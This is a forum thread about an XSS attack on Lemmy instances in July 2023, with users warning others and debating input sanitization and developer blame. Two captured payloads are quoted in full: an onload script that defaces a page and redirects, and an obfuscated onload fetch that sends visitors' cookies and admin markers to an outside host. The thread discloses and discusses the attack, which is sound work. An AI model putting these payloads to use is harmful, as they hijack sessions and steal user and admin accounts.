AlmightySnoo II šŸ¢

(URGENT) Lemmy has an XSS vulnerability in the sidebar

https://sh.itjust.works/post/923025

(URGENT) Lemmy has an XSS vulnerability in the tagline, the sidebar and in the legal information field - sh.itjust.works

# DO NOT OPEN THE ā€œLEGALā€ PAGE ā€” lemmy.world is a victim of an XSS attack right now and the hacker simply injected a JavaScript redirection into the sidebar. It appears the Lemmy backend does not escape HTML in the main sidebar. Not sure if this is also true for community sidebars. [https://sh.itjust.works/pictrs/image/707c0f16-3d5c-4888-b865-34228d968ee6.png] EDIT: the exploit is also in the tagline that appears on top of the main feed for status updates, like the following one for SDF Chatter: [https://sh.itjust.works/pictrs/image/2dc8838f-4611-4b62-92d2-ab45d7b1c560.png] [https://sh.itjust.works/pictrs/image/9195ec9c-166e-4190-a991-26d218089602.png] EDIT 2: The legal information field also has that exploit, so that when you go to the ā€œLegalā€ page it shows the HTML unescaped, but fortunately (for now) heā€™s using double-quotes. "legal_information":" ![\" onload=\"if(localStorage.getItem(`h`) != `true`){document.body.innerHTML = `\u003Ch1\u003ESite has been seized by Reddit for copyright infringment\u003C\u002Fh1\u003E`; setTimeout(() =\u003E {window.location.href = `https:\u002F\u002Flemmy.world\u002Fpictrs\u002Fimage\u002F7aa772b7-9416-45d1-805b-36ec21be9f66.mp4`}, 10000)}\"](https:\u002F\u002Flemmy.world\u002Fpictrs\u002Fimage\u002F66ca36df-4ada-47b3-9169-01870d8fb0ac.png \"lw\")

Jul 10, 2023 at 4:03amWeb
Show threadwetnoodleJul 10, 2023
lemmy.blahaj.zone is affected
Show threadsolrizeJul 10, 2023
To change the main sidebar they apparently first got control of an admin account, oops.
Show threadAlmightySnoo II šŸ¢Jul 10, 2023
yeah an admin account was compromised, but the sidebar vulnerability is serious too, just imagine if the community sidebars have this problem too
Show threadclearedtolandJul 10, 2023
While I appreciate you discovering and sounding the alarm about the vulnerability, Iā€™m here because I love your username.
Show threadMuddybulldogJul 10, 2023

Not sure if itā€™s actually XSS. Lemmy.world did have an admin account compromise so it couldā€™ve been done locally.

It actually looks like itā€™s being propagated via comments. I received more than a handful from lemmy.world and they were in the process of deleting them before they went dark. I nuked the remaining one by hand but you can see that lemmy.blahaj.zone still has the same few remainingā€¦ lemmy.blahaj.zone/search?q=onload%3D&type=All&lisā€¦

Show threadAlmightySnoo II šŸ¢Jul 10, 2023

wow youā€™re right, so itā€™s not just sidebars, itā€™s the whole Markdown parser:

Show threadhawkwindJul 10, 2023
So any comment or post?
Show threadAlmightySnoo II šŸ¢Jul 10, 2023
Yes
Show threadGamers_MateJul 10, 2023
Does that mean all Lemmy instances are at risk?
Show threadMuddybulldogJul 10, 2023

The actually full comment code that I can see in the database is quite disquieting, cookie stealing:

onXXXXXload=ā€œfetch(String.fromCharCode(104,116,116,112,115,58,47,47,122,101,108,101,110,115,107,121,46,122,105,112,47,115,97,118,101,47)+btoa(document.cookie+(document.getElementById(String.fromCharCode(110,97,118,65,100,109,105,110))||{id:String.fromCharCode()}).id))ā€](lemmy.world/ā€¦/66ca36df-4ada-47b3-9169-01870d8fb0aā€¦ ā€œlwā€)

Show threadš™šš™§š™§š™šJul 10, 2023

Yeah theyā€™re stealing jwt tokens and noting when theyā€™re admins.

lemmy.sdf.org/comment/850269

What are these comments on lemmy posts? - SDF Chatter

Are they just an issue with wefwef or trying to use an exploit

Show threadcppJul 10, 2023
This seems like a really basic vulnerability that whoever wrote the code to do that probably should have been aware of. It concerns be about the security of the rest of Lemmy if theyā€™re making such basic errors.
Show threadsudneoJul 10, 2023

Blaming culture does not help with vulnerability disclosure. Vulnerabilities do happen and will happen again.

Writing a parser is not trivial and remember that it was a tiny project until a month ago.

Show threadpfannkuchen_gesichtJul 10, 2023
Trying to blame is indeed of little help here right now. But it also worries me that such a basic vulnerability exists in the first place. Itā€™s like the #1 rule to not trust user-input. I hope this is the only such trivial one and we wonā€™t wake up to someone exploiting an SQL injection next.
Show threadsudneoJul 10, 2023

Honestly it was not trivial, the custom emojis in the markdown parser seems to be vulnerable. Of course everything should be sanitized, but in practice there are cases where itā€™s hard to make a proper sanitization while retaining features to let users write weird stuff. This is not the case of ā€œvalidate a usernameā€ that you know very well which regex to use and which character space.

I would actually say that this vulnerability should have been prevented using proper cookie security, which should make it impossible to steal the session via XSS.

I do acknowledge though that itā€™s not easy to take care of all of this when itā€™s 2 people working on everything (from design to frontend, passing for deployment etc.), especially if there are no specific competencies in appsec.

Show threadSquigletJul 10, 2023
Stop complaining. Contribute to solution.
Show threadOreganoChampionJul 10, 2023

I posted this beforeā€¦ But as a Mod for the Mildly Infuriating And Lemmy Shitposting community; 1 hour before the attack happened I received the following message from the admin that was compromised:

Show threadš˜‹š˜Ŗš˜³š˜¬Jul 10, 2023
Not sanitizing user input is plain stupid. There is no excuse. Ever.
Show threadSnipe_ATJul 10, 2023
what about the time you wrote your ā€œhello worldā€ code? did you sanitize your user input then?
Show threadclearedtolandJul 10, 2023
ā€œListen here you littleā€¦ā€
Show threadš˜‹š˜Ŗš˜³š˜¬Jul 10, 2023
Little Bobby Tables it is.
Show threadMic_Check_One_TwoJul 10, 2023
Simply having it Print ā€œHello Worldā€ without any user interaction? There are no user inputs to sanitize.
Show threadSnipe_ATJul 10, 2023

There is no excuse. Ever.

Show thread3l3s3Jul 10, 2023
He sanitized the user input to the extreme by not allowing any.
Show threadTonyTonyChopperJul 10, 2023
The Apple school of thought
Show thread3l3s3Jul 10, 2023
Best kind of correct
Show threadstappernJul 10, 2023
Seriously? xD
Show threadCyclohexaneJul 10, 2023
Let us see you make a better lemmy then
Show threadpfannkuchen_gesichtJul 10, 2023
They probably donā€™t have one, but that doesnā€™t change the fact that not sanitizing user-input is still insane.
Show threadCyclohexaneJul 10, 2023

Mistakes happen. This is one of the most common vulnerabilities in the software world. Again, itā€™s easy to say itā€™s insane when you arenā€™t the one making it. I donā€™t see you making anything half as good and without mistakes.

Constructive criticism is okay, but this isnā€™t it. Sounds very entitled.

Show threadstappernJul 10, 2023
Weird takeā€¦
Show threadCyclohexaneJul 10, 2023

Itā€™s convenient to completely discredit a large piece of software taking years to develop as ā€œinsaneā€ because they made a mistake (one of the most common security mistakes in the software world) when you donā€™t recognize the difficulty and wouldnā€™t be able to make something 10% as big.

And frankly it sounds silly.

Show threadcrystalJul 11, 2023
The reason itā€™s perceived that way is because code injection in user input, is (one of) the most obvious, well-known, and easiest attacks to do, while at the same time being super easy to prevent.
Show threadCyclohexaneJul 12, 2023

It is one of the most well known, but it also is easy to miss, evidently from how often it happens despite it being very well known.

Itā€™s very easy to fix once itā€™s known, but it is easy to go unnoticed.

Unless you somehow think that most app developers are incompetent, in which case I ask again: show me your better version.

Show threadcrystalJul 12, 2023
I can confidently say that in not a single company project I did frontend development for did I ever leave user input unsanitized.
Show threadCyclohexaneJul 12, 2023
If you are doubting that this is one of the most frequently occurring security issues, I urge to search the web about it. Itā€™s very easy to verify my claim.
Show thread0x2dJul 10, 2023
eval(input())
Show threadClassyJul 12, 2023
xkcd.com/327/
Exploits of a Mom

xkcd
Show threadš˜‹š˜Ŗš˜³š˜¬Jul 12, 2023
Exactly!
Show threadgthutbwdyJul 10, 2023
I donā€™t know too much about lemmy yet, but all of these things (tagline,siudebar and legal info) sound like they should be controlled only by admins, that should be able to add html code anyway (since it their website).
Show threadcarbon_basedJul 10, 2023
If posted text is not properly ā€œescapedā€ (meaning possible HTML tags and scripts made non-executable), an attacker can inject javascript in a comment which is then loaded and executed on other peopleā€™s browsers. It seems that such a method was used to steal log-in cookies from adminā€™s browsers. The attacker then could log in as the admin and proceed to change stuff in other areas of the site.
Show threadiByteABitJul 10, 2023
You say it as if itā€™s an intended feature lol, this was an injection attack
Show thread0x2dJul 10, 2023
ā€œcopyright infrigmentā€